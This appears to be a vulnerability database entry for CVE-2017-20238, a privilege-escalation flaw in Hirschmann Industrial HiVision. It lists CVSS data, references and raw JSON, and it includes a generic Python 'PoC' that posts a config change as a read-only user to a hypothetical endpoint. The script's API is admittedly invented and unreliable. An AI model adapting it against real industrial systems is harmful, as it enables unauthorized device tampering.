CVE-2017-20238

Description

Hirschmann Industrial HiVision versions 06.0.00 and 07.0.00 prior to 06.0.06 and 07.0.01 contains an improper authorization vulnerability that allows read-only users to gain write access to managed devices by bypassing access control mechanisms. Attackers can exploit alternative interfaces such as the web interface or SNMP browser to modify device configurations despite having restricted permissions.

CVSS Details

CVSS Score

7.1

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N

Configurations (Affected Products)

No configuration data available.

Hirschmann Industrial HiVision 06.0.00 - 06.0.05

Hirschmann Industrial HiVision 07.0.00

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Conceptual PoC for CVE-2017-20238
# This script demonstrates how a read-only user might trigger a configuration change.

TARGET_URL = "https://<target-ip>/api/config"  # Hypothetical endpoint
USERNAME = "readonly_user"
PASSWORD = "readonly_pass"

session = requests.Session()

# Step 1: Authenticate as a low-privilege user
login_payload = {
    "username": USERNAME,
    "password": PASSWORD
}
login_response = session.post(f"{TARGET_URL}/login", json=login_payload, verify=False)

if login_response.status_code == 200:
    print("[+] Login successful as read-only user.")

    # Step 2: Attempt to modify configuration (Privilege Escalation)
    # Exploiting the improper authorization on the write interface
    config_payload = {
        "setting": "critical_config",
        "value": "malicious_value"
    }

    exploit_response = session.post(f"{TARGET_URL}/update", json=config_payload, verify=False)

    if exploit_response.status_code == 200:
        print("[+] Configuration modified successfully! Vulnerability confirmed.")
    else:
        print("[-] Failed to modify configuration.")
else:
    print("[-] Login failed.")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2017-20238
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2017-20238
[3] CVE Details https://www.cvedetails.com/cve/CVE-2017-20238/
[4] VulDB https://vuldb.com/cve/CVE-2017-20238
[5] https://assets.belden.com/m/7cc5d59343125b25/original/Security-Bulletin-Restricted-User-Roles-Write-Access-HiVision-2017-01.pdf
[6] https://www.vulncheck.com/advisories/hirschmann-industrial-hivision-improper-authorization-privilege-escalation

Raw JSON Data

JSON

{"cve": {"id": "CVE-2017-20238", "sourceIdentifier": "[email protected]", "published": "2026-04-03T23:17:00.633", "lastModified": "2026-04-07T13:20:55.200", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "Hirschmann Industrial HiVision versions 06.0.00 and 07.0.00 prior to 06.0.06 and 07.0.01 contains an improper authorization vulnerability that allows read-only users to gain write access to managed devices by bypassing access control mechanisms. Attackers can exploit alternative interfaces such as the web interface or SNMP browser to modify device configurations despite having restricted permissions."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 4.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-285"}]}], "references": [{"url": "https://assets.belden.com/m/7cc5d59343125b25/original/Security-Bulletin-Restricted-User-Roles-Write-Access-HiVision-2017-01.pdf", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/hirschmann-industrial-hivision-improper-authorization-privilege-escalation", "source": "[email protected]"}]}}